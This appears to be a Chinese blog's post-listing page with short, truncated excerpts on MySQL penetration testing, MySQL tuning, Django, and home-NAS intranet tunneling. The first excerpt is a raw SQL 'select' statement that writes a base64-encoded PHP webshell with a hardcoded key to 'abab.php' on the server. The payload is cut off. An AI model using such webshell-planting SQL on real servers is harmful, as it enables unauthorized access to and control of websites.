2024-12-29 厉飞雨 阅读(272) 评论(0) 赞(14)

select '<?php file_put_contents("abab.php",base64_decode("Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCS...

2024-12-29 厉飞雨 阅读(305) 评论(0) 赞(13)

前言 === 今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止，不会讲的太细。 一、sqlshell获取 ============ 要利用mysql首先得拿到一个可以执行sql的mysql才能利用，下面就说一下几种常见姿势，欢迎补充。 1、弱口令 这个比较简单，网上工具很多如美杜莎，九头蛇这些比较知名的，msf也有相应的模块。我自己之前也写过一个。要是运气...

2024-12-29 厉飞雨 阅读(309) 评论(0) 赞(14)

MySQL优化 ======= \*\*1. \*\* \*\*避免使用 select \* \*\* 你需要什么信息,就查询什么信息,查询的多了,查询的速度肯定就会慢 **2.** \*\*当你只需要查询出一条数据的时候,要使用 limit 1 \*\* 比如你要查询数据中是否有男生,只要查询一条含有男生的记录就行了,后面不需要再查了,使用Limit 1 可以在找到一条数...

2024-12-29 厉飞雨 阅读(374) 评论(0) 赞(14)

前言 === 因工作需要学习了一下django。特此记录 mysql表映射 ======== 在项目的根目录下执行下面的命令将mysql表映射到django的models中 python manage.py inspectdb > models.py 覆盖models ======== 然后将生成models.py文件覆盖掉站点app中的models....

2024-12-29 厉飞雨 阅读(289) 评论(0) 赞(12)

前言 === 随便记录一下笔记,方便查询.最近是想到什么就记什么. 渗透测试mysql ========= 关于如何攻击mysql请直接看这篇\>[Mysql数据库渗透及漏洞利用总结](https://xz.aliyun.com/t/1491)写的很全 拿shell ====== 1前提需要知道网站的真实**物理路径** 2查看是否允许导入导出 ...

2024-12-29 厉飞雨 阅读(274) 评论(0) 赞(12)

说明 === 涨姿势的文章日常分享 [通过MySQL LOAD DATA特性来达到任意文件读取](https://xz.aliyun.com/t/3973)

2024-12-27 厉飞雨 阅读(376) 评论(0) 赞(17)

<p>哈喽，大家好，我是了不起。</p> <p>最近把旧电脑搞成了NAS，就像折腾着搞一下内网穿透。看了好几个教程，发现都不是最新版本，根本无法使用。本次给大家分享猴子都能做到的内网穿透步骤。</p> <h3>准备前提 {#准备前提}</h3> <p>本次教程使用以下资源：</p> ...

2024-12-27 厉飞雨 阅读(429) 评论(0) 赞(16)

<h1>一、注册nps账号 {#%E4%B8%80%E3%80%81%E6%B3%A8%E5%86%8Cnps%E8%B4%A6%E5%8F%B7}</h1> <blockquote> <p>前往木因博客， <a href="https://blog.muyin.site/console/login?redirec...

2024-12-27 厉飞雨 阅读(610) 评论(0) 赞(22)

<p>最近买了一台二手的群晖 NAS，虽然自带 quickconnect 可以免费进行内网穿透，但是这个小水管实在是非常勉强，于是又折腾了一遍 Frp 来做内网穿透。在<a href="https://51tbox.com/">之前的文章</a>中也已经记录过了搭建 Frp 的过程，这次新增了访问 NAS 部分的内容，以及...

2024-12-27 厉飞雨 阅读(321) 评论(0) 赞(15)

<h2>准备工作 {#准备工作}</h2> <ul> <li>Raspberry（别的支持docker的软路由/家庭服务器等也可以）</li> <li>cloudflare账号（用cloudfalre tunnel）</li> <li>用作nas的硬盘（插到raspberry上的外接...